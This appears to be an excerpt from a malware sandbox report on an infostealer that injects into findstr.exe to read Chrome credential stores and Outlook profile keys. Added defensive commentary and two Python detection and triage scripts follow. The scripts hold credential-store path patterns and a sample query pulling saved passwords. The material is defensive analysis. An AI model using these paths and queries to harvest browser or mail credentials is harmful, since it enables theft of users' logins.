Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Queries volume information: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\zjplj4.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E88B90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 19_2_61E88B90
Source: C:\Users\user\Desktop\ekte.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
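The file and registry opens listed above show the injected findstr.exe reading Chrome's Login Data, Web Data, Cookies and Local State and then walking the Outlook MAPI profile hive. Taken together that is the complete theft path for Chrome: Login Data holds the encrypted saved logins and Local State holds the DPAPI-wrapped AES key that decrypts them. One practitioner check worth noting: the report records Local State being opened under User Data\Default, whereas Chrome keeps it one directory up, directly under User Data, so any pattern should accept both. The Python below is an added detection example written for this page; it is not part of the Joe Sandbox report or of the sample. It groups file and registry access events by acting process, flags any process other than the store's owner that reads these stores, and rates a finding "high" when one process has both the ciphertext and the key or sweeps both browser and mail stores. The event records are constructed from the lines above plus benign noise, and the owner allow-lists are assumptions to tune per environment.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable

# Chromium profile stores: "Login Data" (saved logins, SQLite), "Web Data"
# (autofill), "Cookies", and "Local State" (DPAPI-protected AES key that
# decrypts the other three).  Chrome writes Local State directly under
# "User Data"; the report shows it opened under "Default", so the profile
# directory segment is optional here.
CHROMIUM_STORE_RE = re.compile(
    r"\\User Data\\(?:[^\\]+\\)?(Login Data|Web Data|Cookies|Local State)$",
    re.IGNORECASE,
)
# MAPI profile hive holding Outlook account settings.
OUTLOOK_PROFILE_RE = re.compile(
    r"\\Windows Messaging Subsystem\\Profiles\\Outlook(\\|$)", re.IGNORECASE
)

# Processes expected to open these stores.  Assumption: extend per estate.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe"}
MAIL_IMAGES = {"outlook.exe"}


@dataclass
class Event:
    image: str    # full path of the acting process
    kind: str     # "file" or "registry"
    target: str   # file path or registry key that was opened


@dataclass
class Finding:
    image: str
    browser_stores: set = field(default_factory=set)
    outlook_keys: int = 0

    def severity(self) -> str:
        # Ciphertext plus the key that unlocks it is the full theft path; so
        # is one process sweeping both browser and mail credential stores.
        if {"login data", "local state"} <= self.browser_stores:
            return "high"
        if self.browser_stores and self.outlook_keys:
            return "high"
        return "medium"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Event]) -> dict:
    """One Finding per process image that read a credential store it does not
    own.  Browsers reading their own stores and Outlook reading its own
    profile hive are not reported."""
    findings = {}
    for ev in events:
        actor = _basename(ev.image)
        if ev.kind == "file":
            m = CHROMIUM_STORE_RE.search(ev.target)
            if m and actor not in BROWSER_IMAGES:
                f = findings.setdefault(ev.image, Finding(ev.image))
                f.browser_stores.add(m.group(1).lower())
        elif ev.kind == "registry":
            if OUTLOOK_PROFILE_RE.search(ev.target) and actor not in MAIL_IMAGES:
                f = findings.setdefault(ev.image, Finding(ev.image))
                f.outlook_keys += 1
    return findings


# Constructed sample: the opens the report attributes to the injected
# findstr.exe, plus benign activity by the real owners of those stores.
FINDSTR = r"C:\Windows\SysWOW64\findstr.exe"
CHROME_DEFAULT = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
OUTLOOK_KEY = (r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook")
SAMPLE_EVENTS = [
    Event(FINDSTR, "file", CHROME_DEFAULT + r"\Login Data"),
    Event(FINDSTR, "file", CHROME_DEFAULT + r"\Local State"),
    Event(FINDSTR, "file", CHROME_DEFAULT + r"\Web Data"),
    Event(FINDSTR, "file", CHROME_DEFAULT + r"\Cookies"),
    Event(FINDSTR, "registry", OUTLOOK_KEY + "\\"),
    Event(FINDSTR, "registry", OUTLOOK_KEY + r"\9375CFF0413111d3B88A00104B2A6676\00000001"),
    Event(FINDSTR, "file", r"C:\Users\user\AppData\Local\Temp\6jkxvjx.zip"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file",
          CHROME_DEFAULT + r"\Login Data"),
    Event(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "registry",
          OUTLOOK_KEY + "\\"),
]

if __name__ == "__main__":
    for image, f in detect(SAMPLE_EVENTS).items():
        print(f"{f.severity():6} {image}: stores={sorted(f.browser_stores)} "
              f"outlook_keys={f.outlook_keys}")
```

Fed with real Sysmon or EDR telemetry (file create/open events and registry key opens), the same grouping works per process GUID rather than per image path; the image-based allow-list is deliberately simple and should be replaced with signer or hash checks, since a hollowed chrome.exe would pass a name-only filter.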

Remote Access Functionality

Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29157 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob, 19_2_61E29157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E290EA sqlite3_bind_zeroblob,sqlite3_mutex_leave, 19_2_61E290EA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E290B9 sqlite3_bind_null,sqlite3_mutex_leave, 19_2_61E290B9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29093 sqlite3_bind_int,sqlite3_bind_int64, 19_2_61E29093
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29044 sqlite3_bind_int64,sqlite3_mutex_leave, 19_2_61E29044
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2923E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave, 19_2_61E2923E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E03568 sqlite3_bind_parameter_name, 19_2_61E03568
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E03556 sqlite3_bind_parameter_count, 19_2_61E03556
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E13A33 sqlite3_bind_parameter_index, 19_2_61E13A33
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E16CEE sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 19_2_61E16CEE
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28FDF sqlite3_bind_double,sqlite3_mutex_leave, 19_2_61E28FDF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28FB8 sqlite3_bind_text16, 19_2_61E28FB8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28F4B sqlite3_bind_text64, 19_2_61E28F4B
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28F24 sqlite3_bind_text, 19_2_61E28F24
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28EDD sqlite3_bind_blob64, 19_2_61E28EDD
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28EB6 sqlite3_mutex_leave,sqlite3_bind_blob, 19_2_61E28EB6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E16EBE sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings, 19_2_61E16EBE
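The sqlite3_bind_*, sqlite3_clear_bindings and sqlite3_transfer_bindings functions above were resolved inside findstr.exe, a stock Windows utility that does not link SQLite. Together with the Login Data and Web Data opens earlier in this section, they indicate that the code running in findstr.exe is the injected FormBook payload carrying its own SQLite engine to query the browser stores. A caveat for anyone reading the anti-analysis findings alongside this: the five-call sequence listed earlier at 19_2_61E88B90 (GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter) is the standard MSVC stack-cookie initialisation found in almost every compiled Windows binary and is not on its own evidence of debugger detection. The Python below is an added triage example written for this page, not code from the report or the sample: given a process image name and one memory region, it collects SQLite export names, groups them into the API families needed to open a database, compile a statement, step it and read columns back, checks for browser-store table and column names in both ASCII and UTF-16LE, and reports whether the host image is one that legitimately ships SQLite. The region bytes are constructed, and the list of SQLite-carrying images is an assumption to extend per environment.

```python
import re
from dataclasses import dataclass, field

# SQLite exports as they appear in a loaded engine's name table.
SQLITE_SYMBOL_RE = re.compile(rb"sqlite3_[a-z0-9_]{2,40}")

# API families, keyed by export-name prefix.  Open + query + iterate + read
# is the minimum surface needed to SELECT rows out of a store.
FAMILIES = {
    "open": ("sqlite3_open",),
    "query": ("sqlite3_prepare", "sqlite3_exec"),
    "iterate": ("sqlite3_step",),
    "read": ("sqlite3_column_",),
    "bind": ("sqlite3_bind_",),
}
DUMP_FAMILIES = {"open", "query", "iterate", "read"}

# Table, column and file names a stealer uses against browser stores
# (Chromium "Login Data" table "logins"; Firefox logins.json / moz_logins).
STORE_HINTS = ("logins", "origin_url", "password_value", "Login Data",
               "moz_logins", "logins.json")

# Images that ship their own SQLite, where these names are normal.
# Assumption: extend per estate (Electron apps, Python, Office, ...).
SQLITE_EXPECTED = {"chrome.exe", "msedge.exe", "firefox.exe", "sqlite3.exe"}


@dataclass
class Verdict:
    image: str
    symbols: list = field(default_factory=list)
    families: set = field(default_factory=set)
    store_hints: list = field(default_factory=list)

    @property
    def dump_capable(self) -> bool:
        return DUMP_FAMILIES <= self.families

    @property
    def suspicious(self) -> bool:
        return bool(self.symbols) and self.image.lower() not in SQLITE_EXPECTED


def _has_hint(region: bytes, hint: str) -> bool:
    # Windows code keeps many of these as wide strings, so check UTF-16LE too.
    return hint.encode("ascii") in region or hint.encode("utf-16-le") in region


def triage(image: str, region: bytes) -> Verdict:
    """Classify one memory region of `image` by the SQLite surface it carries."""
    symbols = sorted({m.decode("ascii") for m in SQLITE_SYMBOL_RE.findall(region)})
    families = {fam for fam, prefixes in FAMILIES.items()
                if any(s.startswith(p) for p in prefixes for s in symbols)}
    hints = [h for h in STORE_HINTS if _has_hint(region, h)]
    return Verdict(image, symbols, families, hints)


# Constructed region: SQLite export names next to a wide-string query and a
# browser-store path, the mix an injected stealer leaves in memory.
SAMPLE_REGION = (
    b"\x00" * 16
    + b"sqlite3_open16\x00sqlite3_prepare_v2\x00sqlite3_step\x00"
    + b"sqlite3_column_blob\x00sqlite3_column_text\x00sqlite3_bind_blob\x00"
    + b"sqlite3_bind_text16\x00sqlite3_finalize\x00" + b"\x00" * 8
    + "SELECT origin_url, username_value, password_value FROM logins".encode("utf-16-le")
    + b"\x00\x00\\Google\\Chrome\\User Data\\Default\\Login Data\x00"
)

if __name__ == "__main__":
    v = triage("findstr.exe", SAMPLE_REGION)
    print(f"{v.image}: suspicious={v.suspicious} dump_capable={v.dump_capable}")
    print("families:", sorted(v.families))
    print("store hints:", v.store_hints)
```

On a live host the region bytes come from ReadProcessMemory over each committed private or mapped range; on the sandbox output they come from the .sdmp files listed under the Yara matches. A hit in a process whose on-disk image has no SQLite import or export is strong confirmation that the code is injected, which is the situation the report records for findstr.exe.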